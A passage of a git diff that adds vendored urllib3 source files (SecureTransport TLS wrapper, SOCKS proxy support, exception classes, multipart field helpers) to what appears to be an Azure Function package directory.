result = Security.SSLRead( + self.context, buffer, nbytes, ctypes.byref(processed_bytes) + ) + + # There are some result codes that we want to treat as "not always + # errors". Specifically, those are errSSLWouldBlock, + # errSSLClosedGraceful, and errSSLClosedNoNotify. + if result == SecurityConst.errSSLWouldBlock: + # If we didn't process any bytes, then this was just a time out. + # However, we can get errSSLWouldBlock in situations when we *did* + # read some data, and in those cases we should just read "short" + # and return. + if processed_bytes.value == 0: + # Timed out, no data read. + raise socket.timeout("recv timed out") + elif result in ( + SecurityConst.errSSLClosedGraceful, + SecurityConst.errSSLClosedNoNotify, + ): + # The remote peer has closed this connection. We should do so as + # well. Note that we don't actually return here because in + # principle this could actually be fired along with return data. + # It's unlikely though. + self.close() + else: + _assert_no_error(result) + + # Ok, we read and probably succeeded. We should return whatever data + # was actually read. + return processed_bytes.value + + def settimeout(self, timeout): + self._timeout = timeout + + def gettimeout(self): + return self._timeout + + def send(self, data): + processed_bytes = ctypes.c_size_t(0) + + with self._raise_on_error(): + result = Security.SSLWrite( + self.context, data, len(data), ctypes.byref(processed_bytes) + ) + + if result == SecurityConst.errSSLWouldBlock and processed_bytes.value == 0: + # Timed out + raise socket.timeout("send timed out") + else: + _assert_no_error(result) + + # We sent, and probably succeeded. Tell them how much we sent. + return processed_bytes.value + + def sendall(self, data): + total_sent = 0 + while total_sent < len(data): + sent = self.send(data[total_sent : total_sent + SSL_WRITE_BLOCKSIZE]) + total_sent += sent + + def shutdown(self): + with self._raise_on_error(): + Security.SSLClose(self.context) + + def close(self): + # TODO: should I do clean shutdown here? Do I have to? 
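+        # Editor's note: close() is reference-counted so that file objects
+        # handed out by makefile() keep the TLS session alive; the context,
+        # client cert chain, and temporary keychain are only released once
+        # the last reference is dropped.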
+ if self._makefile_refs < 1: + self._closed = True + if self.context: + CoreFoundation.CFRelease(self.context) + self.context = None + if self._client_cert_chain: + CoreFoundation.CFRelease(self._client_cert_chain) + self._client_cert_chain = None + if self._keychain: + Security.SecKeychainDelete(self._keychain) + CoreFoundation.CFRelease(self._keychain) + shutil.rmtree(self._keychain_dir) + self._keychain = self._keychain_dir = None + return self.socket.close() + else: + self._makefile_refs -= 1 + + def getpeercert(self, binary_form=False): + # Urgh, annoying. + # + # Here's how we do this: + # + # 1. Call SSLCopyPeerTrust to get hold of the trust object for this + # connection. + # 2. Call SecTrustGetCertificateAtIndex for index 0 to get the leaf. + # 3. To get the CN, call SecCertificateCopyCommonName and process that + # string so that it's of the appropriate type. + # 4. To get the SAN, we need to do something a bit more complex: + # a. Call SecCertificateCopyValues to get the data, requesting + # kSecOIDSubjectAltName. + # b. Mess about with this dictionary to try to get the SANs out. + # + # This is gross. Really gross. It's going to be a few hundred LoC extra + # just to repeat something that SecureTransport can *already do*. So my + # operating assumption at this time is that what we want to do is + # instead to just flag to urllib3 that it shouldn't do its own hostname + # validation when using SecureTransport. + if not binary_form: + raise ValueError("SecureTransport only supports dumping binary certs") + trust = Security.SecTrustRef() + certdata = None + der_bytes = None + + try: + # Grab the trust store. + result = Security.SSLCopyPeerTrust(self.context, ctypes.byref(trust)) + _assert_no_error(result) + if not trust: + # Probably we haven't done the handshake yet. No biggie. + return None + + cert_count = Security.SecTrustGetCertificateCount(trust) + if not cert_count: + # Also a case that might happen if we haven't handshaked. + # Handshook? Handshaken? + return None + + leaf = Security.SecTrustGetCertificateAtIndex(trust, 0) + assert leaf + + # Ok, now we want the DER bytes. 
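+            # Editor's note: the DER bytes are copied out into a Python bytes
+            # object here so they remain valid after the CoreFoundation
+            # objects are released in the finally block below.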
+ certdata = Security.SecCertificateCopyData(leaf) + assert certdata + + data_length = CoreFoundation.CFDataGetLength(certdata) + data_buffer = CoreFoundation.CFDataGetBytePtr(certdata) + der_bytes = ctypes.string_at(data_buffer, data_length) + finally: + if certdata: + CoreFoundation.CFRelease(certdata) + if trust: + CoreFoundation.CFRelease(trust) + + return der_bytes + + def version(self): + protocol = Security.SSLProtocol() + result = Security.SSLGetNegotiatedProtocolVersion( + self.context, ctypes.byref(protocol) + ) + _assert_no_error(result) + if protocol.value == SecurityConst.kTLSProtocol13: + raise ssl.SSLError("SecureTransport does not support TLS 1.3") + elif protocol.value == SecurityConst.kTLSProtocol12: + return "TLSv1.2" + elif protocol.value == SecurityConst.kTLSProtocol11: + return "TLSv1.1" + elif protocol.value == SecurityConst.kTLSProtocol1: + return "TLSv1" + elif protocol.value == SecurityConst.kSSLProtocol3: + return "SSLv3" + elif protocol.value == SecurityConst.kSSLProtocol2: + return "SSLv2" + else: + raise ssl.SSLError("Unknown TLS version: %r" % protocol) + + def _reuse(self): + self._makefile_refs += 1 + + def _drop(self): + if self._makefile_refs < 1: + self.close() + else: + self._makefile_refs -= 1 + + +if _fileobject: # Platform-specific: Python 2 + + def makefile(self, mode, bufsize=-1): + self._makefile_refs += 1 + return _fileobject(self, mode, bufsize, close=True) + + +else: # Platform-specific: Python 3 + + def makefile(self, mode="r", buffering=None, *args, **kwargs): + # We disable buffering with SecureTransport because it conflicts with + # the buffering that ST does internally (see issue #1153 for more). + buffering = 0 + return backport_makefile(self, mode, buffering, *args, **kwargs) + + +WrappedSocket.makefile = makefile + + +class SecureTransportContext(object): + """ + I am a wrapper class for the SecureTransport library, to translate the + interface of the standard library ``SSLContext`` object to calls into + SecureTransport. + """ + + def __init__(self, protocol): + self._min_version, self._max_version = _protocol_to_min_max[protocol] + self._options = 0 + self._verify = False + self._trust_bundle = None + self._client_cert = None + self._client_key = None + self._client_key_passphrase = None + self._alpn_protocols = None + + @property + def check_hostname(self): + """ + SecureTransport cannot have its hostname checking disabled. For more, + see the comment on getpeercert() in this file. + """ + return True + + @check_hostname.setter + def check_hostname(self, value): + """ + SecureTransport cannot have its hostname checking disabled. For more, + see the comment on getpeercert() in this file. + """ + pass + + @property + def options(self): + # TODO: Well, crap. + # + # So this is the bit of the code that is the most likely to cause us + # trouble. Essentially we need to enumerate all of the SSL options that + # users might want to use and try to see if we can sensibly translate + # them, or whether we should just ignore them. + return self._options + + @options.setter + def options(self, value): + # TODO: Update in line with above. + self._options = value + + @property + def verify_mode(self): + return ssl.CERT_REQUIRED if self._verify else ssl.CERT_NONE + + @verify_mode.setter + def verify_mode(self, value): + self._verify = True if value == ssl.CERT_REQUIRED else False + + def set_default_verify_paths(self): + # So, this has to do something a bit weird. Specifically, what it does + # is nothing. 
+        #
+        # This means that, if we had previously had load_verify_locations
+        # called, this does not undo that. We need to do that because it turns
+        # out that the rest of the urllib3 code will attempt to load the
+        # default verify paths if it hasn't been told about any paths, even if
+        # the context itself was configured sometime earlier. We resolve that
+        # by just ignoring it.
+        pass
+
+    def load_default_certs(self):
+        return self.set_default_verify_paths()
+
+    def set_ciphers(self, ciphers):
+        # For now, we just require the default cipher string.
+        if ciphers != util.ssl_.DEFAULT_CIPHERS:
+            raise ValueError("SecureTransport doesn't support custom cipher strings")
+
+    def load_verify_locations(self, cafile=None, capath=None, cadata=None):
+        # OK, we only really support cadata and cafile.
+        if capath is not None:
+            raise ValueError("SecureTransport does not support cert directories")
+
+        # Raise if cafile does not exist.
+        if cafile is not None:
+            with open(cafile):
+                pass
+
+        self._trust_bundle = cafile or cadata
+
+    def load_cert_chain(self, certfile, keyfile=None, password=None):
+        self._client_cert = certfile
+        self._client_key = keyfile
+        # Store under the same attribute that wrap_socket() reads back.
+        self._client_key_passphrase = password
+
+    def set_alpn_protocols(self, protocols):
+        """
+        Sets the ALPN protocols that will later be set on the context.
+
+        Raises a NotImplementedError if ALPN is not supported.
+        """
+        if not hasattr(Security, "SSLSetALPNProtocols"):
+            raise NotImplementedError(
+                "SecureTransport supports ALPN only in macOS 10.12+"
+            )
+        self._alpn_protocols = [six.ensure_binary(p) for p in protocols]
+
+    def wrap_socket(
+        self,
+        sock,
+        server_side=False,
+        do_handshake_on_connect=True,
+        suppress_ragged_eofs=True,
+        server_hostname=None,
+    ):
+        # So, what do we do here? Firstly, we assert some properties. This is a
+        # stripped down shim, so there is some functionality we don't support.
+        # See PEP 543 for the real deal.
+        assert not server_side
+        assert do_handshake_on_connect
+        assert suppress_ragged_eofs
+
+        # Ok, we're good to go. Now we want to create the wrapped socket object
+        # and store it in the appropriate place.
+        wrapped_socket = WrappedSocket(sock)
+
+        # Now we can handshake
+        wrapped_socket.handshake(
+            server_hostname,
+            self._verify,
+            self._trust_bundle,
+            self._min_version,
+            self._max_version,
+            self._client_cert,
+            self._client_key,
+            self._client_key_passphrase,
+            self._alpn_protocols,
+        )
+        return wrapped_socket
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/socks.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/socks.py
new file mode 100644
index 0000000..eb90f9d
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/socks.py
@@ -0,0 +1,216 @@
+# -*- coding: utf-8 -*-
+"""
+This module contains provisional support for SOCKS proxies from within
+urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and
+SOCKS5. To enable its functionality, either install PySocks or install this
+module with the ``socks`` extra.
+
+The SOCKS implementation supports the full range of urllib3 features. It also
+supports the following SOCKS features:
+
+- SOCKS4A (``proxy_url='socks4a://...'``)
+- SOCKS4 (``proxy_url='socks4://...'``)
+- SOCKS5 with remote DNS (``proxy_url='socks5h://...'``)
+- SOCKS5 with local DNS (``proxy_url='socks5://...'``)
+- Usernames and passwords for the SOCKS proxy
+
+.. note::
+    It is recommended to use ``socks5h://`` or ``socks4a://`` schemes in
+    your ``proxy_url`` to ensure that DNS resolution is done from the remote
+    server instead of client-side when connecting to a domain name.
+
+SOCKS4 supports IPv4 and domain names with the SOCKS4A extension. SOCKS5
+supports IPv4, IPv6, and domain names.
+
+When connecting to a SOCKS4 proxy the ``username`` portion of the ``proxy_url``
+will be sent as the ``userid`` section of the SOCKS request:
+
+.. code-block:: python
+
+    proxy_url="socks4a://<userid>@proxy-host"
+
+When connecting to a SOCKS5 proxy the ``username`` and ``password`` portion
+of the ``proxy_url`` will be sent as the username/password to authenticate
+with the proxy:
+
+.. code-block:: python
+
+    proxy_url="socks5h://<username>:<password>@proxy-host"
+
+"""
+from __future__ import absolute_import
+
+try:
+    import socks
+except ImportError:
+    import warnings
+
+    from ..exceptions import DependencyWarning
+
+    warnings.warn(
+        (
+            "SOCKS support in urllib3 requires the installation of optional "
+            "dependencies: specifically, PySocks. For more information, see "
+            "https://urllib3.readthedocs.io/en/1.26.x/contrib.html#socks-proxies"
+        ),
+        DependencyWarning,
+    )
+    raise
+
+from socket import error as SocketError
+from socket import timeout as SocketTimeout
+
+from ..connection import HTTPConnection, HTTPSConnection
+from ..connectionpool import HTTPConnectionPool, HTTPSConnectionPool
+from ..exceptions import ConnectTimeoutError, NewConnectionError
+from ..poolmanager import PoolManager
+from ..util.url import parse_url
+
+try:
+    import ssl
+except ImportError:
+    ssl = None
+
+
+class SOCKSConnection(HTTPConnection):
+    """
+    A plain-text HTTP connection that connects via a SOCKS proxy.
+    """
+
+    def __init__(self, *args, **kwargs):
+        self._socks_options = kwargs.pop("_socks_options")
+        super(SOCKSConnection, self).__init__(*args, **kwargs)
+
+    def _new_conn(self):
+        """
+        Establish a new connection via the SOCKS proxy.
+        """
+        extra_kw = {}
+        if self.source_address:
+            extra_kw["source_address"] = self.source_address
+
+        if self.socket_options:
+            extra_kw["socket_options"] = self.socket_options
+
+        try:
+            conn = socks.create_connection(
+                (self.host, self.port),
+                proxy_type=self._socks_options["socks_version"],
+                proxy_addr=self._socks_options["proxy_host"],
+                proxy_port=self._socks_options["proxy_port"],
+                proxy_username=self._socks_options["username"],
+                proxy_password=self._socks_options["password"],
+                proxy_rdns=self._socks_options["rdns"],
+                timeout=self.timeout,
+                **extra_kw
+            )
+
+        except SocketTimeout:
+            raise ConnectTimeoutError(
+                self,
+                "Connection to %s timed out. (connect timeout=%s)"
+                % (self.host, self.timeout),
+            )
+
+        except socks.ProxyError as e:
+            # This is fragile as hell, but it seems to be the only way to raise
+            # useful errors here.
+            if e.socket_err:
+                error = e.socket_err
+                if isinstance(error, SocketTimeout):
+                    raise ConnectTimeoutError(
+                        self,
+                        "Connection to %s timed out. (connect timeout=%s)"
+                        % (self.host, self.timeout),
+                    )
+                else:
+                    raise NewConnectionError(
+                        self, "Failed to establish a new connection: %s" % error
+                    )
+            else:
+                raise NewConnectionError(
+                    self, "Failed to establish a new connection: %s" % e
+                )
+
+        except SocketError as e:  # Defensive: PySocks should catch all these.
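+            # Editor's note: plain socket errors are normalised to urllib3's
+            # NewConnectionError here so callers see a single exception type
+            # for all connection failures, matching the non-proxy code path.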
+ raise NewConnectionError( + self, "Failed to establish a new connection: %s" % e + ) + + return conn + + +# We don't need to duplicate the Verified/Unverified distinction from +# urllib3/connection.py here because the HTTPSConnection will already have been +# correctly set to either the Verified or Unverified form by that module. This +# means the SOCKSHTTPSConnection will automatically be the correct type. +class SOCKSHTTPSConnection(SOCKSConnection, HTTPSConnection): + pass + + +class SOCKSHTTPConnectionPool(HTTPConnectionPool): + ConnectionCls = SOCKSConnection + + +class SOCKSHTTPSConnectionPool(HTTPSConnectionPool): + ConnectionCls = SOCKSHTTPSConnection + + +class SOCKSProxyManager(PoolManager): + """ + A version of the urllib3 ProxyManager that routes connections via the + defined SOCKS proxy. + """ + + pool_classes_by_scheme = { + "http": SOCKSHTTPConnectionPool, + "https": SOCKSHTTPSConnectionPool, + } + + def __init__( + self, + proxy_url, + username=None, + password=None, + num_pools=10, + headers=None, + **connection_pool_kw + ): + parsed = parse_url(proxy_url) + + if username is None and password is None and parsed.auth is not None: + split = parsed.auth.split(":") + if len(split) == 2: + username, password = split + if parsed.scheme == "socks5": + socks_version = socks.PROXY_TYPE_SOCKS5 + rdns = False + elif parsed.scheme == "socks5h": + socks_version = socks.PROXY_TYPE_SOCKS5 + rdns = True + elif parsed.scheme == "socks4": + socks_version = socks.PROXY_TYPE_SOCKS4 + rdns = False + elif parsed.scheme == "socks4a": + socks_version = socks.PROXY_TYPE_SOCKS4 + rdns = True + else: + raise ValueError("Unable to determine SOCKS version from %s" % proxy_url) + + self.proxy_url = proxy_url + + socks_options = { + "socks_version": socks_version, + "proxy_host": parsed.host, + "proxy_port": parsed.port, + "username": username, + "password": password, + "rdns": rdns, + } + connection_pool_kw["_socks_options"] = socks_options + + super(SOCKSProxyManager, self).__init__( + num_pools, headers, **connection_pool_kw + ) + + self.pool_classes_by_scheme = SOCKSProxyManager.pool_classes_by_scheme diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/exceptions.py new file mode 100644 index 0000000..7f4037a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/exceptions.py @@ -0,0 +1,323 @@ +from __future__ import absolute_import + +from .packages.six.moves.http_client import IncompleteRead as httplib_IncompleteRead + +# Base Exceptions + + +class HTTPError(Exception): + """Base exception used by this module.""" + + pass + + +class HTTPWarning(Warning): + """Base warning used by this module.""" + + pass + + +class PoolError(HTTPError): + """Base exception for errors caused within a pool.""" + + def __init__(self, pool, message): + self.pool = pool + HTTPError.__init__(self, "%s: %s" % (pool, message)) + + def __reduce__(self): + # For pickling purposes. + return self.__class__, (None, None) + + +class RequestError(PoolError): + """Base exception for PoolErrors that have associated URLs.""" + + def __init__(self, pool, url, message): + self.url = url + PoolError.__init__(self, pool, message) + + def __reduce__(self): + # For pickling purposes. 
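+        # Editor's note: the pool argument is dropped (pickled as None)
+        # because live connection pools are not picklable; only the URL
+        # survives a pickle round-trip.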
+        return self.__class__, (None, self.url, None)
+
+
+class SSLError(HTTPError):
+    """Raised when SSL certificate fails in an HTTPS connection."""
+
+    pass
+
+
+class ProxyError(HTTPError):
+    """Raised when the connection to a proxy fails."""
+
+    def __init__(self, message, error, *args):
+        super(ProxyError, self).__init__(message, error, *args)
+        self.original_error = error
+
+
+class DecodeError(HTTPError):
+    """Raised when automatic decoding based on Content-Type fails."""
+
+    pass
+
+
+class ProtocolError(HTTPError):
+    """Raised when something unexpected happens mid-request/response."""
+
+    pass
+
+
+#: Renamed to ProtocolError but aliased for backwards compatibility.
+ConnectionError = ProtocolError
+
+
+# Leaf Exceptions
+
+
+class MaxRetryError(RequestError):
+    """Raised when the maximum number of retries is exceeded.
+
+    :param pool: The connection pool
+    :type pool: :class:`~urllib3.connectionpool.HTTPConnectionPool`
+    :param string url: The requested URL
+    :param exceptions.Exception reason: The underlying error
+
+    """
+
+    def __init__(self, pool, url, reason=None):
+        self.reason = reason
+
+        message = "Max retries exceeded with url: %s (Caused by %r)" % (url, reason)
+
+        RequestError.__init__(self, pool, url, message)
+
+
+class HostChangedError(RequestError):
+    """Raised when an existing pool gets a request for a foreign host."""
+
+    def __init__(self, pool, url, retries=3):
+        message = "Tried to open a foreign host with url: %s" % url
+        RequestError.__init__(self, pool, url, message)
+        self.retries = retries
+
+
+class TimeoutStateError(HTTPError):
+    """Raised when passing an invalid state to a timeout"""
+
+    pass
+
+
+class TimeoutError(HTTPError):
+    """Raised when a socket timeout error occurs.
+
+    Catching this error will catch both :exc:`ReadTimeoutErrors
+    <ReadTimeoutError>` and :exc:`ConnectTimeoutErrors <ConnectTimeoutError>`.
+    """
+
+    pass
+
+
+class ReadTimeoutError(TimeoutError, RequestError):
+    """Raised when a socket timeout occurs while receiving data from a server"""
+
+    pass
+
+
+# This timeout error does not have a URL attached and needs to inherit from the
+# base HTTPError
+class ConnectTimeoutError(TimeoutError):
+    """Raised when a socket timeout occurs while connecting to a server"""
+
+    pass
+
+
+class NewConnectionError(ConnectTimeoutError, PoolError):
+    """Raised when we fail to establish a new connection. Usually ECONNREFUSED."""
+
+    pass
+
+
+class EmptyPoolError(PoolError):
+    """Raised when a pool runs out of connections and no more are allowed."""
+
+    pass
+
+
+class ClosedPoolError(PoolError):
+    """Raised when a request enters a pool after the pool has been closed."""
+
+    pass
+
+
+class LocationValueError(ValueError, HTTPError):
+    """Raised when there is something wrong with a given URL input."""
+
+    pass
+
+
+class LocationParseError(LocationValueError):
+    """Raised when get_host or similar fails to parse the URL input."""
+
+    def __init__(self, location):
+        message = "Failed to parse: %s" % location
+        HTTPError.__init__(self, message)
+
+        self.location = location
+
+
+class URLSchemeUnknown(LocationValueError):
+    """Raised when a URL input has an unsupported scheme."""
+
+    def __init__(self, scheme):
+        message = "Not supported URL scheme %s" % scheme
+        super(URLSchemeUnknown, self).__init__(message)
+
+        self.scheme = scheme
+
+
+class ResponseError(HTTPError):
+    """Used as a container for an error reason supplied in a MaxRetryError."""
+
+    GENERIC_ERROR = "too many error responses"
+    SPECIFIC_ERROR = "too many {status_code} error responses"
+
+
+class SecurityWarning(HTTPWarning):
+    """Warned when performing security-reducing actions"""
+
+    pass
+
+
+class SubjectAltNameWarning(SecurityWarning):
+    """Warned when connecting to a host with a certificate missing a SAN."""
+
+    pass
+
+
+class InsecureRequestWarning(SecurityWarning):
+    """Warned when making an unverified HTTPS request."""
+
+    pass
+
+
+class SystemTimeWarning(SecurityWarning):
+    """Warned when system time is suspected to be wrong"""
+
+    pass
+
+
+class InsecurePlatformWarning(SecurityWarning):
+    """Warned when certain TLS/SSL configuration is not available on a platform."""
+
+    pass
+
+
+class SNIMissingWarning(HTTPWarning):
+    """Warned when making an HTTPS request without SNI available."""
+
+    pass
+
+
+class DependencyWarning(HTTPWarning):
+    """
+    Warned when an attempt is made to import a module with missing optional
+    dependencies.
+    """
+
+    pass
+
+
+class ResponseNotChunked(ProtocolError, ValueError):
+    """Response needs to be chunked in order to read it as chunks."""
+
+    pass
+
+
+class BodyNotHttplibCompatible(HTTPError):
+    """
+    Body should be :class:`http.client.HTTPResponse` like
+    (have an fp attribute which returns raw chunks) for read_chunked().
+    """
+
+    pass
+
+
+class IncompleteRead(HTTPError, httplib_IncompleteRead):
+    """
+    Response length doesn't match expected Content-Length
+
+    Subclass of :class:`http.client.IncompleteRead` to allow int value
+    for ``partial`` to avoid creating large objects on streamed reads.
+    """
+
+    def __init__(self, partial, expected):
+        super(IncompleteRead, self).__init__(partial, expected)
+
+    def __repr__(self):
+        return "IncompleteRead(%i bytes read, %i more expected)" % (
+            self.partial,
+            self.expected,
+        )
+
+
+class InvalidChunkLength(HTTPError, httplib_IncompleteRead):
+    """Invalid chunk length in a chunked response."""
+
+    def __init__(self, response, length):
+        super(InvalidChunkLength, self).__init__(
+            response.tell(), response.length_remaining
+        )
+        self.response = response
+        self.length = length
+
+    def __repr__(self):
+        return "InvalidChunkLength(got length %r, %i bytes read)" % (
+            self.length,
+            self.partial,
+        )
+
+
+class InvalidHeader(HTTPError):
+    """The header provided was somehow invalid."""
+
+    pass
+
+
+class ProxySchemeUnknown(AssertionError, URLSchemeUnknown):
+    """ProxyManager does not support the supplied scheme"""
+
+    # TODO(t-8ch): Stop inheriting from AssertionError in v2.0.
+
+    def __init__(self, scheme):
+        # 'localhost' is here because our URL parser parses
+        # localhost:8080 -> scheme=localhost, remove if we fix this.
+        if scheme == "localhost":
+            scheme = None
+        if scheme is None:
+            message = "Proxy URL had no scheme, should start with http:// or https://"
+        else:
+            message = (
+                "Proxy URL had unsupported scheme %s, should use http:// or https://"
+                % scheme
+            )
+        super(ProxySchemeUnknown, self).__init__(message)
+
+
+class ProxySchemeUnsupported(ValueError):
+    """Fetching HTTPS resources through HTTPS proxies is unsupported"""
+
+    pass
+
+
+class HeaderParsingError(HTTPError):
+    """Raised by assert_header_parsing, but we convert it to a log.warning statement."""
+
+    def __init__(self, defects, unparsed_data):
+        message = "%s, unparsed data: %r" % (defects or "Unknown", unparsed_data)
+        super(HeaderParsingError, self).__init__(message)
+
+
+class UnrewindableBodyError(HTTPError):
+    """urllib3 encountered an error when trying to rewind a body"""
+
+    pass
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/fields.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/fields.py
new file mode 100644
index 0000000..fcd526e
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/fields.py
@@ -0,0 +1,274 @@
+from __future__ import absolute_import
+
+import email.utils
+import mimetypes
+import re
+
+from .packages import six
+
+
+def guess_content_type(filename, default="application/octet-stream"):
+    """
+    Guess the "Content-Type" of a file.
+
+    :param filename:
+        The filename to guess the "Content-Type" of using :mod:`mimetypes`.
+    :param default:
+        If no "Content-Type" can be guessed, default to `default`.
+    """
+    if filename:
+        return mimetypes.guess_type(filename)[0] or default
+    return default
+
+
+def format_header_param_rfc2231(name, value):
+    """
+    Helper function to format and quote a single header parameter using the
+    strategy defined in RFC 2231.
+
+    Particularly useful for header parameters which might contain
+    non-ASCII values, like file names. This follows
+    `RFC 2388 Section 4.4 <https://tools.ietf.org/html/rfc2388#section-4.4>`_.
+
+    :param name:
+        The name of the parameter, a string expected to be ASCII only.
+    :param value:
+        The value of the parameter, provided as ``bytes`` or ``str``.
+    :ret:
+        An RFC-2231-formatted unicode string.
+    """
+    if isinstance(value, six.binary_type):
+        value = value.decode("utf-8")
+
+    if not any(ch in value for ch in '"\\\r\n'):
+        result = u'%s="%s"' % (name, value)
+        try:
+            result.encode("ascii")
+        except (UnicodeEncodeError, UnicodeDecodeError):
+            pass
+        else:
+            return result
+
+    if six.PY2:  # Python 2:
+        value = value.encode("utf-8")
+
+    # encode_rfc2231 accepts an encoded string and returns an ascii-encoded
+    # string in Python 2 but accepts and returns unicode strings in Python 3
+    value = email.utils.encode_rfc2231(value, "utf-8")
+    value = "%s*=%s" % (name, value)
+
+    if six.PY2:  # Python 2:
+        value = value.decode("utf-8")
+
+    return value
+
+
+_HTML5_REPLACEMENTS = {
+    u"\u0022": u"%22",
+    # Replace "\" with "\\".
+    u"\u005C": u"\u005C\u005C",
+}
+
+# All control characters from 0x00 to 0x1F *except* 0x1B.
+_HTML5_REPLACEMENTS.update(
+    {
+        six.unichr(cc): u"%{:02X}".format(cc)
+        for cc in range(0x00, 0x1F + 1)
+        if cc not in (0x1B,)
+    }
+)
+
+
+def _replace_multiple(value, needles_and_replacements):
+    def replacer(match):
+        return needles_and_replacements[match.group(0)]
+
+    pattern = re.compile(
+        r"|".join([re.escape(needle) for needle in needles_and_replacements.keys()])
+    )
+
+    result = pattern.sub(replacer, value)
+
+    return result
+
+
+def format_header_param_html5(name, value):
+    """
+    Helper function to format and quote a single header parameter using the
+    HTML5 strategy.
+
+    Particularly useful for header parameters which might contain
+    non-ASCII values, like file names. This follows the `HTML5 Working Draft
+    Section 4.10.22.7`_ and matches the behavior of curl and modern browsers.
+
+    .. _HTML5 Working Draft Section 4.10.22.7:
+        https://w3c.github.io/html/sec-forms.html#multipart-form-data
+
+    :param name:
+        The name of the parameter, a string expected to be ASCII only.
+    :param value:
+        The value of the parameter, provided as ``bytes`` or ``str``.
+    :ret:
+        A unicode string, stripped of troublesome characters.
+    """
+    if isinstance(value, six.binary_type):
+        value = value.decode("utf-8")
+
+    value = _replace_multiple(value, _HTML5_REPLACEMENTS)
+
+    return u'%s="%s"' % (name, value)
+
+
+# For backwards-compatibility.
+format_header_param = format_header_param_html5
+
+
+class RequestField(object):
+    """
+    A data container for request body parameters.
+
+    :param name:
+        The name of this request field. Must be unicode.
+    :param data:
+        The data/value body.
+    :param filename:
+        An optional filename of the request field. Must be unicode.
+    :param headers:
+        An optional dict-like object of headers to initially use for the field.
+    :param header_formatter:
+        An optional callable that is used to encode and format the headers. By
+        default, this is :func:`format_header_param_html5`.
+    """
+
+    def __init__(
+        self,
+        name,
+        data,
+        filename=None,
+        headers=None,
+        header_formatter=format_header_param_html5,
+    ):
+        self._name = name
+        self._filename = filename
+        self.data = data
+        self.headers = {}
+        if headers:
+            self.headers = dict(headers)
+        self.header_formatter = header_formatter
+
+    @classmethod
+    def from_tuples(cls, fieldname, value, header_formatter=format_header_param_html5):
+        """
+        A :class:`~urllib3.fields.RequestField` factory from old-style tuple parameters.
+
+        Supports constructing :class:`~urllib3.fields.RequestField` from
+        parameters of key/value strings AND key/filetuple. A filetuple is a
+        (filename, data, MIME type) tuple where the MIME type is optional.
+        For example::
+
+            'foo': 'bar',
+            'fakefile': ('foofile.txt', 'contents of foofile'),
+            'realfile': ('barfile.txt', open('realfile').read()),
+            'typedfile': ('bazfile.bin', open('bazfile').read(), 'image/jpeg'),
+            'nonamefile': 'contents of nonamefile field',
+
+        Field names and filenames must be unicode.
+        """
+        if isinstance(value, tuple):
+            if len(value) == 3:
+                filename, data, content_type = value
+            else:
+                filename, data = value
+                content_type = guess_content_type(filename)
+        else:
+            filename = None
+            content_type = None
+            data = value
+
+        request_param = cls(
+            fieldname, data, filename=filename, header_formatter=header_formatter
+        )
+        request_param.make_multipart(content_type=content_type)
+
+        return request_param
+
+    def _render_part(self, name, value):
+        """
+        Overridable helper function to format a single header parameter. By
+        default, this calls ``self.header_formatter``.
+
+        :param name:
+            The name of the parameter, a string expected to be ASCII only.
+        :param value:
+            The value of the parameter, provided as a unicode string.
+        """
+
+        return self.header_formatter(name, value)
+
+    def _render_parts(self, header_parts):
+        """
+        Helper function to format and quote a single header.
+
+        Useful for single headers that are composed of multiple items. E.g.,
+        'Content-Disposition' fields.
+
+        :param header_parts:
+            A sequence of (k, v) tuples or a :class:`dict` of (k, v) to format
+            as `k1="v1"; k2="v2"; ...`.
+        """
+        parts = []
+        iterable = header_parts
+        if isinstance(header_parts, dict):
+            iterable = header_parts.items()
+
+        for name, value in iterable:
+            if value is not None:
+                parts.append(self._render_part(name, value))
+
+        return u"; ".join(parts)
+
+    def render_headers(self):
+        """
+        Renders the headers for this request field.
+        """
+        lines = []
+
+        sort_keys = ["Content-Disposition", "Content-Type", "Content-Location"]
+        for sort_key in sort_keys:
+            if self.headers.get(sort_key, False):
+                lines.append(u"%s: %s" % (sort_key, self.headers[sort_key]))
+
+        for header_name, header_value in self.headers.items():
+            if header_name not in sort_keys:
+                if header_value:
+                    lines.append(u"%s: %s" % (header_name, header_value))
+
+        lines.append(u"\r\n")
+        return u"\r\n".join(lines)
+
+    def make_multipart(
+        self, content_disposition=None, content_type=None, content_location=None
+    ):
+        """
+        Makes this request field into a multipart request field.
+
+        This method sets the "Content-Disposition", "Content-Type" and
+        "Content-Location" headers on the request parameter.
+
+        :param content_type:
+            The 'Content-Type' of the request body.
+        :param content_location:
+            The 'Content-Location' of the request body.
+ + """ + self.headers["Content-Disposition"] = content_disposition or u"form-data" + self.headers["Content-Disposition"] += u"; ".join( + [ + u"", + self._render_parts( + ((u"name", self._name), (u"filename", self._filename)) + ), + ] + ) + self.headers["Content-Type"] = content_type + self.headers["Content-Location"] = content_location diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/filepost.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/filepost.py new file mode 100644 index 0000000..709fa36 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/filepost.py @@ -0,0 +1,98 @@ +from __future__ import absolute_import + +import binascii +import codecs +import os +from io import BytesIO + +from .fields import RequestField +from .packages import six +from .packages.six import b + +writer = codecs.lookup("utf-8")[3] + + +def choose_boundary(): + """ + Our embarrassingly-simple replacement for mimetools.choose_boundary. + """ + boundary = binascii.hexlify(os.urandom(16)) + if not six.PY2: + boundary = boundary.decode("ascii") + return boundary + + +def iter_field_objects(fields): + """ + Iterate over fields. + + Supports list of (k, v) tuples and dicts, and lists of + :class:`~urllib3.fields.RequestField`. + + """ + if isinstance(fields, dict): + i = six.iteritems(fields) + else: + i = iter(fields) + + for field in i: + if isinstance(field, RequestField): + yield field 